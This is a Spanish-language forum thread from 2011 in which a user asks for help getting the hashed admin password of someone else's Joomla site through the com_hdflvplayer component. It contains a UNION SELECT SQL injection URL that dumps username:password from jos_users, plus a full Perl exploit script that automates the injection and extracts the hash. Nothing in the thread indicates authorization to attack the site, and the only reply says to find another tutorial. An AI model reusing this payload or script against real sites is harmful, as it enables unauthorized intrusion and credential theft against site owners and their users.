Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: bruno9111 en 9 Marzo 2011, 11:29 am



Título: Que pasa con esta injecction? [SQL]
Publicado por: bruno9111 en 9 Marzo 2011, 11:29 am
Hola chicos y chicas.
Bueno espero que me puedan ayudar. Estoy intentando obtener el pass cifrado de una pagina web en joomla. Creo que la pagina web no esta muy bien cuidada, dados los pocos conocimientos del dueño. Solo que tiene para buscar bugs es muy dificil ya que tiene solo componente extra que es:

com_hdflvplayer

No se, si tienen idea de como es este componente, les explico, al parecer tienen: 4 parametros que son: id, nombre, linkdelvideo y descripcion.
Ahora bien he provado de muchas maneras, lo maximo que he logrado es eso:

index.php?option=com_hdflvplayer&id=87+UNION+SELECT+concat(username,0x3a,password),87+from+jos_users--

De esta manera, logro que aparezca el numero 87 en la parte de descripcion, si cambio los dos 87, por cualquier otro numero cambia igualmente en la parte de la descripcion. Mi pregunta es la siguiente: ¿Esta parcheado el componente?¿Estoy aplicando bien la injeccion?¿Deberia usar otra injeccion?

espero que puedan ayudarme! thank :)


Título: Re: Que pasa con esta injecction? [SQL]
Publicado por: bruno9111 en 9 Marzo 2011, 12:49 pm
Perdon me olvide de postear esto, que es el exploit en perl:

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n
  • CIHUY Admin Password Nya GAN
  • : $1\n\n";
}
else{print "\n
  • Exploit GAGAL GAN !
  • \n";
}


Ejecute el exploit, pero el problema es el siguiente, va siempre al else final, osea me muestra :
  • Exploit GAGAL GAN !

Entonces para llegar a esa url que puse en mi post principal, remplace las variables por lo que es cada una. Ejemplo $tukulesto="jos_users"; puse directamente en la direccion que crea jos_users y asi sucesivamente.

Sinceramente no puedo entender cual sea el problema... gracias..


Título: Re: Que pasa con esta injecction? [SQL]
Publicado por: Edu en 9 Marzo 2011, 14:26 pm
Es tu primer SQL inyection? busca otro tutorial y empieza de 0.